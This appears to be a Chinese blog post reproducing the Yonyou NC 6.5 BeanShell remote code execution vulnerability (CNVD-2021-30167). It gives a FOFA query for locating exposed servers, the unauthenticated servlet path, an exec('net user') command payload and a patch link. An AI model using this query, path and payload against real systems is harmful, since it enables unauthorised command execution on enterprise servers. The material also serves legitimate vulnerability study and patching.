一、漏洞概述
2021年06月03日,用友官方发布了用友BeanShell远程代码执行漏洞的风险通告,漏洞编号为CNVD-2021-30167,漏洞等级:严重,漏洞评分:9.8。

用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。成功利用该漏洞的攻击者可以直接在目标机器上执行任意代码,并以用友NC软件的用户权限执行任意命令。

该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。

该漏洞利用复杂度低,攻击者无需用户交互及相关权限便可直接执行任意代码,危害度很高。

二、影响版本
 NC6.5版本

三、漏洞复现
1、使用fofa进行搜索
语法:title='YONYOU NC'

2.URL访问测试接口
/servlet/~ic/bsh.servlet.BshServlet

3、任意代码执行
exec("net user");

4.修复方式
用友NC官方说明:该漏洞为第三方jar包漏洞导致,用友NC官方已于4月9日解决并验证,且已通过服务渠道推送了解决方案,授权用户可以访问下载链接进行下载。补丁下载地址:
http://umc.yonyou.com/ump/querypatchdetailedmng?PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19

CNVD-2021-30167 用友NC命令执行漏洞复现相关推荐

  1. 用友远程命令执行漏洞并提权

    用友的命令执行漏洞,print hello 发现可以执行命令 , whami 和id 都查一波权限,发现是root,呵呵,权限这么大,很好搞啊 ps -ef|grep sshd 查一波 发现可以ssh ...

  2. CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议

    CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议 本文仅为验证漏洞,在本地环境测试验证,无其它目的 漏洞编号: ...

  3. Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 kali docker

    Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 漏洞环境搭建 漏洞复现 反弹shell 题外话1 题外话2 影响版本:Apache Shiro <= 1.2.4 漏洞产生 ...

  4. 华为路由器远程命令执行漏洞复现(CVE-2017-17215)

    华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值. CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞 ...

  5. PHPMailer远程命令执行漏洞复现

    ​PHPMailer远程命令执行漏洞复现 一.漏洞简介 PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, ...

  6. FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349)

    #FastJson1.2.24反序列化导致任意命令执行漏洞(CVE-2017-18349)# 一.漏洞简介 Pippo是一款基于Java的Web框架.FastjsonEngine是其中的一个JSON处 ...

  7. 【vulhub】Apereo CAS 4.1 反序列化命令执行漏洞复现

    楼主困了,这里就直接写上楼主自己的一些操作 详细过程可以看Apereo CAS 4.1 反序列化命令执行漏洞复现 特征: 1.网站根目录下有cas目录 2.如图所示,有apereo CAS图标 3.如 ...

  8. 开源堡垒机JumpServer远程命令执行漏洞复现

    声明 好好学习,天天向上 漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统.JumpServer 使用Python ...

  9. Dlink路由器 CNVD-2018-01084 远程命令执行漏洞 复现分析

    Dlink路由器 CNVD-2018-01084复现分析 0x01 背景介绍 D-Link DIR 615/645/815路由器1.03及之前的固件版本存在远程命令执行漏洞.该漏洞是由于service ...

最新文章

  1. 计算机的好处和坏处的英语作文,《电脑的好处和坏处》英语作文 80词以上 谢谢...
  2. 网站结构优化——不能忽视的优化重点
  3. 六种微服务架构的设计模式
  4. php 代码线程,php实现多线程代码
  5. VTK:图片之ImageSinusoidSource
  6. [渝粤教育] 天津现代职业技术学院 餐饮服务实务(翁莉) 参考 资料
  7. vue路由的钩子函数有哪些?都做了哪些事情?
  8. 如何在关闭窗口的时候,不让浏览器自动弹出确认关闭对话框
  9. Oracle 查看索引语句
  10. 进击的django【第一集】
  11. ES6的类Class基础知识点
  12. linux块设备驱动简述(Linux驱动开发篇)
  13. es中的keyword相关功能
  14. Android将数据导出为excel文件的方法
  15. Windows11台式机连接Type-C触摸屏显示器
  16. 免费打造自己的个人网站,免费域名、免费空间、FTP、数据库什么的,一个不能少,没钱,也可以这么任性...
  17. Prometheus配置企业微信报警
  18. prometheus告警功能
  19. 会员营销如何提升企业与会员之间的互动频率
  20. IE浏览器下载文本文件(txt,csv等)

热门文章

  1. mysql的终端窗口是什么意思_MySQL之终端Terminal(dos界面)管理数据库、数据表、数据的基本操作...
  2. 程序员们注意了,警惕JS代码复制陷阱
  3. matlab 分母有理化,第5章频率特性精讲.ppt
  4. CesiumforUnrealQuickstart_译
  5. 中文纠错——CRF+N-grams
  6. Python练习(二)
  7. 好领导,六字诀“先之、劳之、无倦”,出自《论语》子路问政。子曰:“先之劳之。”请益,曰:“无倦。”
  8. linux C time
  9. MongoDB的安装到使用 + Python操作MongoDB + 有关系和无关系数据库比较
  10. 机器学习性能指标精确率、召回率、F1值、ROC、PRC与AUC